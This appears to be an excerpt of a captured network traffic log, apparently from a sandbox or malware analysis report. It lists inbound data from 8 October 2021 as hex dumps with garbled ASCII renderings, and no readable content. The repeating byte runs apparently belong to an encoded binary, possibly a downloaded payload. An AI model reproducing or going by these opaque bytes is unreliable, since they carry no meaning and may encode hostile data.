2021-10-08 15:51:51 UTC	55	IN	Data Raw: 58 99 c5 1f b0 6d 2b ad 88 0d 0c e2 91 a2 2a 2a 45 eb 17 7d 34 42 7b 6d 22 17 12 f1 e0 e0 94 29 c9 29 da d2 da d2 cf 37 a5 d2 9f c4 e9 76 8f 9d d6 c8 c8 a7 a7 d7 6b 47 97 b1 81 7c 99 b5 8d 99 d4 c3 75 5f 46 6e a8 5a be 8e 7f 77 0d 65 54 8f fc 24 6a c4 f3 8e 52 8b b4 76 96 2e 5b 20 7e f4 76 e1 11 6e ab e1 15 78 89 8f bd 0c 90 20 77 64 d1 3c 33 c0 e7 71 3b d3 08 d9 5f 2a 58 99 da d2 cd 33 b2 72 bd 0c c2 98 58 99 d6 c8 c2 98 5b 20 71 55 32 3e 3f dd 3e 5a f0 07 37 ca f9 9c 2c 2f d9 4f 71 55 77 64 cc b0 4d ff d2 bf 73 5a be 8e 75 5f 45 eb 12 f1 fa 1f f9 9c 4b fa 76 e1 27 a3 dd 59 6f 50 f3 8e 6b 47 9e 41 8b 94 09 5b 43 e6 86 08 ab e1 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65 Data Ascii: Xm+*E}4B{m"))7vkG\|u_FnZweT$jRv.[ ~vnx wd<3q;_X3rX[ qU2>?>Z7,/OqUwdMsZu_EKv'YoPkGA[ChWtA_*Fn09Z(&e
2021-10-08 15:51:51 UTC	56	IN	Data Raw: 8a 7f 77 2d b2 6b 47 87 8a 7e f4 7c f0 61 2f c4 9d da d2 db 54 e1 63 46 6e ee 02 be 8e 75 5f 43 e6 80 f9 ec fd 86 08 be 8e 75 5f 43 e6 9b ba e4 ea 97 b1 83 80 bf 11 76 e1 63 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b 9e 41 8d 99 dd 59 6f 50 e3 67 50 86 28 26 4d ff c7 24 7d 72 bb 07 33 c0 f5 93 c6 a2 38 4c 5c a3 a3 cd 5a 9e 61 2f d8 cd 5c a3 a4 50 f2 0c 92 25 fb a1 aa 5e df 5e e2 e5 70 d3 25 9e 24 1c 7d 72 aa 5e c8 a7 a7 d7 3b d3 34 42 17 7d 52 8b e0 e0 8f 9d d1 3c 76 e1 06 d4 a0 46 0f 69 24 1c 7b 6d 29 a8 2e 34 2c 2f ff ab f6 15 1c 09 3e 5a f2 0c 8b 94 48 73 3c 56 b4 76 8f 9d d0 ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73 Data Ascii: w-kG~\|a/TcFnu_Cu_Cvc3K n=3KAYoPgP(&M$}r38L\Za/\P%^^p%$}r^;4B}R<vFi${m).4,/>ZHs<Vvc3$A%^^s
2021-10-08 15:51:51 UTC	57	IN	Data Raw: 62 b1 9c 3d bd 0c 90 20 76 e1 07 56 f5 93 87 8a 65 38 2d b2 52 8b fa 1f ff ab 88 0d 11 6e af ea 94 29 c7 24 75 5f 5c a3 ed 80 8a 11 1d 8b f1 89 ec fd c5 1f d1 3c 69 42 16 fa 70 d3 33 c0 e1 63 76 e1 43 e6 9b ba e6 ef e5 6c bb 07 22 17 0e e7 13 73 1b 86 06 d4 ea f8 7e f4 35 c5 3f dd 3c 56 fa 1f f9 9c 51 08 f9 9c 11 6e bd 0c c7 24 34 42 44 69 31 bb 22 17 6d 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 4c 7c 85 85 d1 3c 55 12 9f c4 f2 0c af ea fb a1 a7 d7 3e 5a cd 33 c3 1a 76 e1 06 d4 a1 c9 44 69 27 a3 ae 68 a5 d2 fb a1 c1 16 88 0d 00 c5 7d 72 b5 f9 f9 9c 4b fa 70 d3 0f 69 4a 77 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f Data Ascii: b= vVe8-Rn)$u_\<iBp3cvCl"s~5?<VQn$4BDi1"mL\|V)ZAl)ZAl)ZAlL\|<U>Z3vDi'h}rKpiJwzs.4!g:QzVX`d:Qo
2021-10-08 15:51:51 UTC	59	IN	Data Raw: f8 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 3b d3 40 9a b0 6d 4c 7c f0 07 56 94 29 a8 5a 9f 14 f5 92 e6 57 17 7d 72 d8 cd 33 c0 93 a7 d7 4a d7 4b fb 63 2b ad e6 ee e2 e5 6c c9 29 a8 5b 20 12 f1 89 8f 9d ec c1 36 1e 0d 65 38 4c 7c f0 06 04 cf 37 ca ab e1 62 b1 ef 84 03 4c 7c a3 f1 a9 85 85 85 85 85 85 85 84 c3 1a 04 cf 37 ca aa 5e a7 d7 4b fa 1f c3 26 Data Ascii: n=3;@mL\|V)ZW}r3JKc+l)[ 6e8L\|7bL\|7^K&
2021-10-08 15:51:51 UTC	59	IN	Data Raw: 01 11 6e ce b5 f9 9c 3d d9 ff ab e1 63 33 c0 92 25 9e 41 e2 e5 6c 9a 04 ef dd 59 1b 86 08 d9 4f 02 6a c4 9d bf 11 6e cf 37 ca ab e1 63 33 93 9b 9a 61 2f b6 7b 6d 4c 7c f1 19 81 7c f0 07 56 95 ac 63 33 c0 93 a7 84 3f fd ff ab e1 63 33 c0 93 a6 d5 46 6e ce b5 f9 9d bf 11 6e ce b5 f9 cf 0b 40 06 d4 c3 1a 04 cf 37 cb 5e a7 d7 4b fa 1f 91 a2 4b fa 1f 90 20 41 de fb f8 1a 04 cf 37 ca ab e0 80 f9 9c 3d d8 cd 32 3e 5a 9e 41 e2 e5 3f e1 43 bf 11 6e ce b5 79 68 c1 5e 27 a3 cc 4e 01 48 72 e8 74 dc d6 38 4c 7c f0 05 51 08 d9 4f 50 ba a5 8b 94 29 a8 5a 1e 0d 64 ae 68 c0 83 80 79 68 c1 16 fa 1f 9f 3b 53 0d 65 d0 ba 85 8a ef 04 cf 37 1a 04 cf 38 b1 6f 50 86 b0 6d 4c 73 a6 d5 46 6e 6e ce b5 f6 ee 82 fe 28 ae 68 c0 9c c7 24 1b 86 08 d9 4f 03 4c 2f 8a 31 e2 e5 6c c9 29 28 Data Ascii: n=c3%AlYOjn7c3a/{mL\|\|Vc3?c3Fnn@7^KK A7=2>ZA?Cnyh^'NHrt8L\|QOP)Zdhyh;Se78oPmLsFnn(h$OL/1l)(
2021-10-08 15:51:51 UTC	60	IN	Data Raw: 31 89 d5 74 89 bd 49 c7 11 5c 8a 23 87 b8 92 17 7c c1 e4 db b1 de 00 f4 d4 f2 a4 61 8c 27 3e 6b df 6f c2 a9 51 39 ae 59 41 d3 14 c4 b9 33 de ea e1 53 f1 b9 de eb d3 71 ce 85 16 ca 25 ae 15 48 0b 50 e8 c4 c7 14 a0 76 aa 6e 88 3d e1 53 3e 6a e2 d5 66 8b 87 ba 88 3d d8 cd 33 c1 5e a7 d6 a8 5a 9e 41 dd a3 f2 e1 5c 44 56 4e be 5a a1 0e d8 0c dd ed bf bf 2e 95 93 3c 69 cc 8f 15 47 8e 24 64 89 e4 d5 1d b4 3b ec bd 33 f3 b1 c9 16 e3 58 97 8e 1a 3a bd 32 d6 f6 f1 b7 1e 33 18 c1 c6 9c f1 b7 36 79 ac 5d e5 52 37 f4 a8 64 02 f4 a0 78 4a 49 5d 1b 22 29 08 e7 ed be 16 c4 09 65 a8 64 3a 6f d8 f3 0a e3 e7 4f 7f 49 8d a7 a3 f3 fe 16 96 10 84 3d bc b4 16 c4 c1 28 7e ca ff 95 fc 1a 48 4d b7 c0 d7 75 1f ae 54 b1 d7 75 79 56 80 c7 2d 8f 62 8c e2 d8 27 9e a1 f4 c6 9f 0f 54 cc Data Ascii: 1tI\#\|a'>koQ9YA3Sq%HPvn=S>jf=3^ZA\DVNZ.<iG$d;3X:236y]R7dxJI]")ed:oOI=(~HMuTuyV-b'T
2021-10-08 15:51:51 UTC	61	IN	Data Raw: 22 cf 0a 09 66 77 59 a7 ea 40 62 1d b6 f2 31 cf 0a bc b7 a3 f0 4b c7 1e 30 0f 54 a3 f0 2f 8b b0 50 a6 68 dc ea e0 dd 4d c2 88 30 35 f8 12 cc b4 4b fa 23 61 13 87 b6 93 9b 62 8d 51 34 86 34 82 c2 24 20 aa 62 05 6d fc 18 53 31 13 4f a3 f1 09 67 49 c9 59 27 cf 0b 08 e5 08 e5 0c de 87 b6 23 a5 86 34 12 cd 7f 4b b2 4e c5 23 a5 ee 1e 31 bf 2d b2 49 09 60 54 b4 82 c5 ef bf fd 9d 57 2c cb 15 a4 6b fb 9a 94 12 59 20 b6 40 ff 90 bc b1 77 5f be b5 69 79 e4 d1 b8 bb 63 08 8d a2 1b bd 40 64 fe 13 37 f1 c9 12 cd 08 e1 58 ad dd 75 64 ba bf ed ba 7d 48 87 b0 9d 85 69 78 0e dd bd 36 a7 ed 5c 99 61 15 cc 8a b5 c3 ba bf 8d a3 55 28 b2 48 e3 5d a9 e6 67 07 d2 85 f9 a6 09 61 63 09 13 49 b1 d5 06 ee 3e 60 94 13 47 ca 9b 80 d5 7c d4 f9 98 0a 2d 8b 78 df b6 42 80 c0 73 63 ef bd Data Ascii: "fwY@b1K0T/PhM05K#abQ44$ bmS1OgIY'#4KN#1-I`TW,kY @w_iyc@d7Xud}Hix6\aU(H]gacI>`G\|-xBsc
2021-10-08 15:51:51 UTC	63	IN	Data Raw: f9 a5 90 19 98 0a d1 04 19 b9 af d2 1f a8 30 01 09 63 07 61 d1 0b fa 28 b4 41 68 f7 1a 33 ba b2 1a 33 9b 8d d6 ff e9 41 d2 88 2e 03 5b 16 0f 5f c6 94 1f a5 d0 8e ee 36 86 3b 74 ee 1a 36 44 58 2a 1b 18 ce ea c9 67 0c c0 a2 4f 33 1a 34 86 38 fa 2f 18 cf af da 40 6f d0 8a 62 81 1b b6 39 ce b5 f8 32 3e 5a 4e 81 42 68 fc 97 8d cf 0b 2e 08 e5 50 a9 e0 c3 21 42 5f 9b 81 d0 81 d8 f6 8c 2d 3d e3 e0 db 2f 8d fd 9d ed bb 4f 38 72 e3 53 36 6d 77 44 52 9d 84 0f 52 89 b5 01 72 36 7d 91 98 ea c2 56 ae ac 59 a2 71 fa 25 3a 6b dd 63 bc b0 e8 ce ca 91 d7 71 3a 6b 22 2d e9 4c 2c 15 3e 60 97 8b a5 e8 d2 85 97 8b 93 9e ba bc 66 82 16 c3 fa 26 fd 9f 10 d5 96 17 b5 c0 57 2e 88 34 fa 26 91 9b 16 c3 be b7 5e 9e d9 76 75 66 37 f3 06 ed 00 fc 58 a0 32 07 26 18 97 88 69 7b 31 82 a6 Data Ascii: 0ca(Ah33A.[_6;t6DX*gO348/@ob92>ZNBh.P!B_-=/O8rS6mwDRRr6}VYq%:kcq:k"-L,>`f&W.4&^vuf7X2&i{1
2021-10-08 15:51:51 UTC	64	IN	Data Raw: cd 0a e8 d8 f8 07 63 26 14 fd 92 d5 72 34 76 09 6f b4 42 84 37 16 ce 6d 78 32 0a 0d 51 c0 a7 7f 43 7e c0 07 62 21 a1 45 df d6 fc a0 72 58 ad 9a 0c 9a 0c 92 11 3e 6e f2 38 74 e8 c0 a7 e7 45 c7 10 c4 a9 f8 2e 14 c1 0a e9 62 82 0a ee e2 d6 14 c6 7a d8 19 b2 a2 78 2a 19 49 c6 66 88 cd 00 7d 41 7a d8 4d cc cc 83 f8 29 dc e4 9a 0b 0c d1 54 bc ee 31 db 67 65 0b 58 aa 7a d8 ed b3 e8 c7 3c 65 2c 1c 19 b2 7e c7 2c 1c 0d 57 eb 49 29 9a f4 22 df 6c 0d 57 d7 79 d4 f1 31 89 3b e1 d3 73 f6 27 07 64 32 0c 92 17 11 5c cb 1c 6d 7e 94 1b da e0 b8 b2 26 13 23 ab a9 ee 2a 18 e7 43 f2 3e 4a 45 e7 43 ee 30 3d ea f8 2b 51 39 36 76 11 5f fa 2e 8c 27 17 4c cc 81 d0 8b 3c 67 99 84 a3 fc b8 b1 77 55 82 cf 47 c1 4a 46 36 76 b5 c8 f7 a9 90 11 26 10 a8 6b 07 67 01 79 5c 92 31 8a 11 5e Data Ascii: c&r4voB7mx2QC~b!ErX>n8tE.bzxIf}AzM)T1geXz<e,~,WI)"lWy1;s'd2\m~&#C>JEC0=+Q96v_.'L<gwUGJF6v&kgy\1^
2021-10-08 15:51:51 UTC	65	IN	Data Raw: 86 30 f0 3f 52 b3 8e 23 fa 27 ee 3a 7e cc a9 e4 e3 50 4c 49 74 e9 03 79 0c d7 07 63 03 79 77 51 0f 5a 34 71 21 a6 71 66 a3 fe 2f 85 85 b7 6a f6 9c 0f 68 f1 27 92 2b 9d 60 9c e5 5c 2b 9d c9 19 a7 d7 4b fa 9f c4 9d 8f 9d 80 0a e2 3b ec f3 b1 e8 cb 2e 0a 0a e0 07 6b 99 88 a3 f0 a6 6f 98 09 f3 b4 ed ba 03 76 94 13 2f 8c 55 28 3d e1 93 9e 86 31 04 f6 ac 5a c6 9b ea c1 52 b2 54 b7 06 ec c8 9f ef bc ae 50 98 0b 78 de cb 16 f0 3f d9 78 1a 33 34 75 d4 f4 95 9b c2 af 98 04 a3 fa 7b 5b d9 79 99 83 6b 71 8e 2d 04 f9 1e 3b 9c 0b 29 9e 02 fc 1f a6 5e 92 c9 1c c5 2a 96 1b 2b 98 bf 24 98 06 ac 56 f4 25 d0 8f d5 73 78 d3 5b 15 6c fd 50 b2 9f f0 d3 75 94 1d 4d cb 91 96 98 07 e6 db fc 10 74 e8 7b 59 57 23 a7 e3 6f 63 e6 dc 1a 37 0b 53 96 1d 0a ee 7a d8 db 67 30 0b 92 17 95 Data Ascii: 0?R#':~PLItycywQZ4q!qf/jh'+`\+K;.kov/U(=1ZRTPx?x34u{[ykq-;)^*+$V%sx[lPuMt{YW#oc7Szg0
2021-10-08 15:51:51 UTC	67	IN	Data Raw: c4 ee 67 6f 34 2c 46 28 26 21 95 ac 22 72 bf 70 a0 35 a0 0b 14 94 44 1b e9 30 39 ce b5 f9 cc f3 cf 43 83 c7 24 1c 09 34 24 72 91 f2 4f 77 01 0f 69 42 64 b6 1f d9 2b cc d5 34 2a 7e 80 97 d4 b1 9d ca e8 80 9c 7a eb 7b 6d 4c 3d ac 02 a7 a5 bd 4a 12 85 e4 ae 1c 6c 8e 1b 86 08 98 56 f7 f9 ec ae 0d 00 b7 b8 eb 08 b0 29 dc b2 35 c5 1f 90 44 08 bc f8 72 8c 73 3e 35 86 7c 99 cd 76 95 c9 6e ce b5 f9 9c 7c 83 e5 18 8a 73 33 b2 06 a0 07 33 ac 0a 9b ce d0 fd a6 55 12 f1 c8 c2 f5 f2 42 0c 96 4f 53 61 43 93 e1 17 18 b8 80 f9 9c 3d aa 31 c9 5b 65 4c 0f 08 95 d8 a8 1d 8b 94 29 a8 3f b0 04 9b d6 a9 bf 7e b8 f4 75 18 ff ab e1 63 72 b7 98 5d 6c ac 0f 08 ba ea b4 02 af ad e6 ef 84 03 0d 00 a8 3b 9d da be e7 37 af 86 7d 16 95 e1 17 18 b8 80 f9 9c 3d 99 d0 d6 ac 0d 04 87 ef e8 Data Ascii: go4,F(&!"rp5D09C$4$rOwiBd+4*~z{mL=JlV)5Drs>5\|vn\|s33UBOSaC=1[eL)?~ucr]l;7}=
2021-10-08 15:51:51 UTC	68	IN	Data Raw: 83 f3 eb 18 90 52 db 20 7b 15 3d d8 cd 33 a5 a1 a6 39 8d fd c8 ce f3 8e 1b 86 08 98 56 f8 73 1c 7d 01 3a 38 0a b9 6c a0 00 c5 1f 90 59 69 23 eb 19 e8 b8 e5 09 29 ee 02 ca ab a0 23 f7 f1 c5 7b 03 2d df 33 af a9 a8 3f 9a 38 4c 7c f0 75 30 4b 88 48 07 25 ff e7 05 34 05 51 08 d9 4f 42 0b 06 ba cc d5 2a 4b 99 da 9e 35 a0 01 48 73 5a 9e 00 a0 2b cc fe 4d 93 ce f3 eb 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 3d bd 60 c8 c9 48 3b b6 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 0f 1a 61 5d 41 86 49 96 41 90 70 a7 b2 35 c5 1f 90 61 40 39 a0 0f 19 f4 64 c4 fc 50 d5 32 5b 67 3d d8 cd 56 f8 7b 0e 88 41 86 69 27 d1 54 db 20 77 23 99 b5 f9 9c 7c 88 48 0a af 8b e6 8d f0 4b 9e 20 7d 3e 5a 9e 41 a3 a3 b4 06 b7 8c 62 c2 f4 10 ec fd a6 14 9b df 32 4c 08 aa 32 3e 5a 9e 33 a1 a1 8a 74 b8 e9 Data Ascii: R {=39Vs}:8lYi#)#{-3?8L\|u0KH%4QOB*K5HsZ+Mc~z{mL=`H;c~z{mLa]AIAp5a@9dP2[g=V{Ai'T w#\|HK }>ZAb2L2>Z3t
2021-10-08 15:51:51 UTC	69	IN	Data Raw: e1 63 33 c0 93 a7 d7 4a e6 27 a3 cc 26 d3 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c8 36 ff ab e0 76 53 0d 65 38 4c 7c f0 07 56 94 29 a8 5a 9e 40 ce 11 6e cf a1 a5 d2 bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 92 b5 09 5b 21 06 80 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 Data Ascii: c3J'&Al)ZAl6vSe8L\|V)Z@nn=3[!=3K n=3K n=3K n=3K n=3K n=3K n=3K n=3
2021-10-08 15:51:51 UTC	71	IN	Data Raw: 9b bb 2f b7 ce b4 5e a6 65 39 d6 c9 31 44 96 2f ae 6a f2 0e d1 3e 6c cb 18 fd 90 20 22 15 4e 83 b6 7a f3 8f 85 84 1b 87 92 24 04 ce ad e7 69 43 fe d7 b4 89 70 d3 71 55 22 17 4d ff 9b ba b5 f9 ac 62 a9 dd 49 0a 22 16 ea f9 b4 77 4c 83 7f 76 c9 2b 9b b8 b6 79 5e a5 e4 ea c8 a7 e7 73 6c cb 18 fe 00 c4 b5 f8 32 3f f5 92 0d 64 9e 40 77 65 10 ec fd a6 63 33 f6 15 78 e6 d9 4f 35 c5 29 a8 6c c8 97 4e 7e f5 a3 32 c1 17 5d 24 3c a9 23 98 13 8c e9 89 70 d3 41 1d 74 dc e1 63 05 51 3e 5a a8 5b 00 c4 bd 0d 45 ea d8 cc 90 21 b5 f8 3a 50 a6 55 12 f1 89 8f 9d bf 11 6e fe 28 26 21 a5 d2 8f 9c 25 9f d4 c2 80 f8 0a dc f7 99 95 53 f2 0d 45 eb 4d ff 9d bf 27 a3 fb a1 f9 9c 0d 65 0e e7 47 f1 a9 dd 79 69 62 b0 4d fe 08 d8 ed 81 5c a2 6b c6 02 4b 5a 1f 30 b8 20 53 ad a7 77 9b 45 Data Ascii: /^e91D/j>l "Nz$iCpqU"MbI"wLv+y^sl2?d@wec3xO5)lN~2]$<#pAtcQ>Z[E!:PUn(&!%SEM'eGyibM\kKZ0 SwE
2021-10-08 15:51:51 UTC	72	IN	Data Raw: 04 8e 1a 40 5f 6b 46 5a 9e 00 c4 b9 02 8b 95 bc 8a 50 87 8e 1b c7 24 e8 f4 51 08 3d d8 8c 16 2e 34 03 4c b8 80 b8 80 4d ff ea f8 ba 85 c4 9d 2f b6 3a 51 88 0d 24 1c 65 38 0d 65 64 b6 3a 51 44 69 03 4c 40 5f 6b 47 d8 cd 72 d8 d5 46 2f b6 73 a5 2d 4d 00 c5 5f a7 d7 4b fa 1f 90 20 52 06 d5 46 6e ce b5 79 6f 50 d1 3c 56 94 29 88 54 91 63 33 c0 93 a7 d7 0b 14 01 48 73 5a 9e 41 a2 3f 9d bf 11 6e ce b5 b9 6f 7c f0 07 56 94 29 e8 87 0e e7 71 55 12 f1 c9 5a b6 7b 6d 4c 7c f0 47 83 a8 5a 9e 41 e2 e5 2c 5c 8b 94 29 a8 5a 9e 01 3b fb a1 c9 29 a8 5a de a8 72 d8 cd 33 c0 93 e7 02 e2 e5 6c c9 29 a8 1a 76 95 ac 63 33 c0 93 e7 03 9c 3d d8 cd 33 c0 d3 33 dc d7 4b fa 1f 90 60 dd e5 6c c9 29 a8 5a de aa 5a 9e 41 e2 e5 6c 89 ff fb a1 c9 29 a8 5a de b4 8e 1b 86 08 d9 4f 43 89 Data Ascii: @_kFZP$Q=.4LM/:Q$e8ed:QDiL@_kGrF/s-M_K RFnyoP<V)Tc3HsZA?no\|V)qUZ{mL\|GZA,\)Z;)Zr3l)vc3=33K`l)ZZAl)ZOC
2021-10-08 15:51:51 UTC	73	IN	Data Raw: 7e 98 56 f0 27 c4 f8 68 e0 8e 72 b5 d6 e8 80 8b f5 e7 02 ca ab e1 50 79 97 4e 7e f4 10 ec fd a6 55 66 da b0 43 a9 97 e4 b6 18 96 42 06 a1 99 e9 05 23 fc 57 42 38 76 a2 6b 29 c1 7b 42 44 1d f9 fd d2 cc b0 6d 4c 5e 58 66 44 96 2e 34 42 10 8d fb 8f e9 05 30 4b ae 34 21 fc 48 11 1b d6 94 5a ec 98 40 0a 81 46 2d b2 06 b5 9b 94 66 f0 52 d7 28 4f 6f 32 4b aa 02 b9 70 b6 08 8c 4a 4d bc 8a 11 6e ba e4 88 23 d6 8b d1 78 ad ba e6 86 64 d4 b6 2b f1 fa 6d 29 db 01 14 cf 74 dc d7 4b fa 6b 34 27 cd 6f 33 a9 b0 0f 1c 59 47 83 f2 69 31 ee 5e 9d fc 24 2e 09 23 fc 40 31 f2 62 de b8 c9 29 a8 5a 95 53 f2 f3 71 55 12 f1 ab e1 63 33 c1 e9 89 70 2c 2f b6 59 21 f0 6b 2e 52 b6 37 98 66 bb 07 56 9e be 71 aa a1 c9 29 f5 e7 04 ac 17 0f 06 bc d9 3b b6 15 0a b8 f4 7e bd 57 17 7d 72 ca Data Ascii: ~V'hrPyN~UfCB#WB8vk){BDmL^XfD.4B0K4!HZ@F-fR(Oo2KpJMn#xd+m)tKk4'o3YGi1^$.#@1b)ZSqUc3p,/Y!k.R7fVq);~W}r
2021-10-08 15:51:51 UTC	75	IN	Data Raw: 2b 53 e9 7c 18 ff ea 91 ae d2 bf 50 0c 82 5f 49 80 06 2a ce ae 80 f9 dd 30 35 7f 77 25 14 7d d3 be 70 33 b2 9a 38 0d ef 24 09 d0 ba c4 17 cd 8b 6b b9 ca 65 d0 af 01 b7 00 25 17 95 ac 22 9d 1f 85 0e e7 30 b3 44 d1 2e 40 9f 40 a0 b9 1b 0f 81 7c b1 65 98 92 da 2c cd 78 0e e7 30 b3 54 37 1a 8f 62 4f e6 f0 ef 84 42 1d 87 0f 6d c7 db ab 86 67 d5 46 6e ce b4 ce b5 f9 9c 38 f6 ea 06 1d 91 4a 88 f3 6e 1d 63 33 81 f6 6d f4 ef 7b 92 7d e7 fa e0 1f 69 41 0a 22 e8 0b 38 d9 c2 67 c2 67 69 c7 af 15 87 78 3e b2 72 99 3f ad 47 0f 96 d1 68 55 9f 3b 2d 53 09 b3 f4 51 82 8e a3 32 c1 e9 2a bf 9a c7 db ac f7 70 d3 00 4f 6b e6 10 13 8c 4a fa 92 f5 18 00 3a 47 96 c6 a2 0a 57 83 21 6a 3a b0 5d cd 33 81 f6 7d ca 54 70 2c 4f 96 a5 2d 4d 0d 55 fa 1f d1 b6 17 dc d7 0a 57 6b 52 00 3a Data Ascii: +S\|P_I05w%}p38$ke%"0D.@@\|e,x0T7bOBmgFn8Jnc3m{}iA"8ggix>r?GhU;-SQ2pOkJ:GW!j:]3}Tp,O-MUWkR:
2021-10-08 15:51:51 UTC	76	IN	Data Raw: 5c 46 c4 75 5b 72 53 0d 24 96 aa 4b 71 55 53 87 0a 65 c7 da 24 39 26 21 d4 97 29 a5 59 1b c7 ae ec 45 53 58 12 0e 18 07 4a 9f c4 dc 5d bd ad 5e ea 75 eb 2e bf ee fc cc a4 b8 80 b8 f9 b8 95 27 17 38 c1 e9 88 e8 1a ec fd e7 fb 39 76 5d 70 58 66 44 97 aa b6 7b 2c a5 7a 4a cb 7b e0 1f 6e 28 2e dc d7 0a 57 bf a9 1c 5c 28 d9 b0 97 80 11 6e 8f f5 4f bb c7 71 d8 32 c0 70 71 bd 0c a3 93 7b d5 66 32 5a ae 97 d5 46 2f de 14 9d ea 38 7f 88 f2 09 ed 68 c0 d2 e1 57 af b9 fb d4 8a 11 04 cf 5d 25 9e 41 d8 74 30 b2 27 a3 8c 43 2a 2a 6b 3e 7e f4 51 5e bb 07 17 04 e7 71 55 12 f3 8e 5a c3 de db 54 8f 9d bf 50 d2 df 5e e6 bb 97 b1 ae 56 28 26 60 92 c9 29 e9 30 01 48 32 78 8e 1b c7 18 83 80 b8 bd 20 12 b0 65 64 b6 3a 59 b7 fe 69 45 13 73 1b 8e 33 c0 d2 b9 76 e1 22 11 82 fe 68 Data Ascii: \Fu[rS$KqUSe$9&!)YESXJ]^u.'89v]pXfD{,zJ{n(.W\(nOq2pq{f2ZF/8hW]%At0'C**k>~Q^qUZTP^V(&`)0H2x ed:YiEs3v"h
2021-10-08 15:51:51 UTC	77	IN	Data Raw: d8 0a dd 59 1b c2 24 59 dc 28 d8 15 55 fa 1f 90 20 56 2e fd 95 10 a9 51 f7 66 56 f0 ef 84 03 4c 83 39 31 44 97 1d 0e 6a 3b 2c d1 94 bc 01 b7 00 2b f3 66 bb 07 56 90 9a c7 db aa f6 90 ad 19 7e 0a 7d c7 db ab 1f 7d 2a c2 4e 0a 22 e8 0a 7d f7 15 78 a7 8c 02 a2 b4 89 71 f1 3c a9 23 67 d0 ca 43 35 4e 7e 0b 9e e5 e9 fb a1 88 56 9c 55 32 b7 9a 08 26 45 eb 3a 0b 90 48 26 e1 50 5e 2c dd d2 46 e5 93 58 67 9d 22 9e be 71 ab 45 76 68 3f 22 e9 de 46 e7 8e e4 14 6d d1 b5 06 2b 53 99 28 af 15 87 74 40 c2 11 b5 ca fc 72 8b 6b b8 7e 60 68 41 0e 6c 9c fd 2d 71 0e b9 58 c0 6c 37 26 7a 03 68 d4 48 77 40 13 f8 dc 5c 87 8e 92 da 2d 4d 57 ff 68 4b fe 0c b6 f6 cd b8 72 53 f5 57 94 7f 24 1c 49 78 25 c5 41 b8 a4 54 04 eb 7f fe d7 b4 7b e8 1c 5a 46 e5 93 58 94 ac 8b c4 9d fe ae 08 Data Ascii: Y$Y(U V.QfVL91Dj;,+fV~}}*N"}xq<#gC5N~VU2&E:H&P^,FXg"qEvh?"Fm+S(t@rk~`hAl-qXl7&zhHw@\-MWhKrSW$Ix%AT{ZFX
2021-10-08 15:51:51 UTC	79	IN	Data Raw: b2 00 b0 2e 68 b3 83 ef e0 8e 72 8f c1 62 d7 24 6f 3f af 89 e6 a2 17 38 1e 4c 2b f9 da 9d ec fd a6 55 3f 22 e8 0b 9f 04 44 1a 60 cd 56 e6 87 de ae 60 ac 23 89 8f 9d bf 11 26 21 d5 56 94 29 a8 5a 9a 41 83 f2 7e 95 ff ff ac 72 d8 8c 42 f8 d9 4e 81 3d 51 08 f4 93 67 b6 b8 dd a1 22 e8 0a 34 80 10 2f b6 3a 05 dd 31 ab 68 a4 09 02 90 e0 d3 41 a3 44 69 47 0f 49 7c 94 19 7e 90 20 53 59 9e 29 fd 66 88 e1 e8 a1 c9 2d 70 8e fe a3 96 70 8c fc cf c8 59 f2 fb 48 b0 92 db ae f1 61 2f f7 de 7b 78 6d ac 26 ac 63 72 8c 41 8a 01 c1 72 81 25 c4 5d 16 05 af 17 65 d0 ba c4 db f4 1d 00 25 cb a3 c5 5a 15 a8 2f f9 df a1 36 54 ae 80 a9 28 63 30 35 35 81 f7 4c 39 45 bb 0f 99 f1 02 1e 48 f8 4a 88 f2 f8 08 31 9f 34 06 5f fe 6d c7 bf 25 13 23 51 4d 72 03 7f 30 0a a1 36 c2 d7 4d 87 3d Data Ascii: .hrb$o?8L+U?"D`V`#&!V)ZA~rBN=Qg"4/:1hADiGI\|~ SY)f-ppYHa/{xm&crAr%]e%Z/6T(c055L9EHJ14_m%#QMr06M=
